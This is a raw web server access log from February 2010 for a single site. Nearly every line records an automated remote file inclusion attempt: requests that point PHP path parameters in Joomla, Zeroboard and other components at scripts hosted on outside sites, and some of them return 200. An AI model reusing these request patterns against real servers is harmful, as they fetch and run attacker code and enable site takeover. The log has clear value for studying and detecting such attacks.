61.78.109.87 - - [15/Feb/2010:09:02:29 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:02:29 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:02:50 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:02:50 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:03:30 -0800] "GET /logs/access_100126.log%20%20//write.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:03:30 -0800] "GET /write.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:03:30 -0800] "GET /logs//write.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:03:45 -0800] "GET /logs/access_100130.log/delete.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:04:59 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:05:54 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:05:54 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:46 -0800] "GET /phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:46 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:46 -0800] "GET /logs/access_100207.log/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:51 -0800] "GET /phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:51 -0800] "GET /logs/access_100207.log/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:06:51 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:07:35 -0800] "GET /logs/access_100109.log/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:09:07:44 -0800] "GET /logs//?include_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:09:07:45 -0800] "GET /?include_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:09:07:47 -0800] "GET /logs/access_100109.log/phphtml.php?htmlclass_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:08:27 -0800] "GET /logs/access_100126.log//write.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:09:09:03 -0800] "GET /logs/access_100201.log//write.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:09:09:04 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:09:09:06 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:09:09:06 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:09:09:39 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:09:12:19 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:09:12:19 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:12:56 -0800] "GET /errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:12:58 -0800] "GET /errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:09:14:10 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:14:46 -0800] "GET /admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:14:46 -0800] "GET /admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:15:33 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:15:33 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:15:34 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:15:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:15:36 -0800] "GET /view.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:15:36 -0800] "GET /logs/access_100117.log%20%20/view.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:15:36 -0800] "GET /logs/view.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:54 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:54 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:55 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:59 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:59 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:17:59 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:18:15 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:18:15 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:18:15 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:18:15 -0800] "GET /index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:18:59 -0800] "GET /logs/access_100114.log/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:18:59 -0800] "GET /errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:18:59 -0800] "GET /logs/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:19:00 -0800] "GET /logs/access_100114.log/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:19:00 -0800] "GET /errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:19:00 -0800] "GET /logs/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:16 -0800] "GET /logs//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:17 -0800] "GET /logs/access_100112.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:17 -0800] "GET /index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:20:19 -0800] "GET /logs/access_100111.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:20:38 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:20:38 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:20:38 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:09:20:38 -0800] "GET /index.php?DOCUMENT_ROOT=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:46 -0800] "GET /logs/access_100112.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:46 -0800] "GET /logs//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:47 -0800] "GET /index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:20:50 -0800] "GET /logs/access_100117.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:20:59 -0800] "GET /logs/access_100112.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:21:00 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:21:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:09:21:04 -0800] "GET /logs/access_100103.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:21:11 -0800] "GET /logs/access_100117.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:22:53 -0800] "GET /logs/access_100117.log/view.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:09:23:24 -0800] "GET /logs/access_100112.log//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:09:23:25 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:09:23:26 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:09:23:40 -0800] "GET /logs/?DOCUMENT_ROOT=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:09:23:41 -0800] "GET /?DOCUMENT_ROOT=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
85.246.171.219 - - [15/Feb/2010:09:26:51 -0800] "GET /logs/access_100122.log HTTP/1.1" 200 1199973 "-" "0chdtadvdwteqcgsdmxjpgkwc" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:28:24 -0800] "GET /write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:28:24 -0800] "GET /logs/access_100109.log%20%20//write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:28:24 -0800] "GET /logs//write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:28:24 -0800] "GET /logs/access_100126.log%20%20//write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:30:36 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:30:36 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:30:36 -0800] "GET /logs/access_100126.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:30:36 -0800] "GET /logs/access_100109.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:09:30:51 -0800] "GET /logs/access_100112.log%20%20//?_zb_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:09:30:51 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:09:30:51 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:33:22 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:33:23 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:33:23 -0800] "GET /logs/access_100109.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:33:23 -0800] "GET /logs/access_100126.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:34:08 -0800] "GET /logs////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:34:08 -0800] "GET /logs/access_100123.log%20%20////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:34:09 -0800] "GET ///index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:34:45 -0800] "GET /logs/access_100104.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:09:35:52 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:09:35:52 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:09:36:09 -0800] "GET /logs/access_100117.log%20%20//?_zb_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:36:21 -0800] "GET /logs////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:36:21 -0800] "GET /logs/access_100123.log%20%20////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:36:22 -0800] "GET ///index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:37:40 -0800] "GET /logs/access_100126.log//write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:09:37:40 -0800] "GET /logs/access_100109.log//write.php?dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:38:59 -0800] "GET /logs/access_100208.log%20%20////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:41:34 -0800] "GET /logs/access_100208.log%20%20////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:09:44:22 -0800] "GET /logs//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
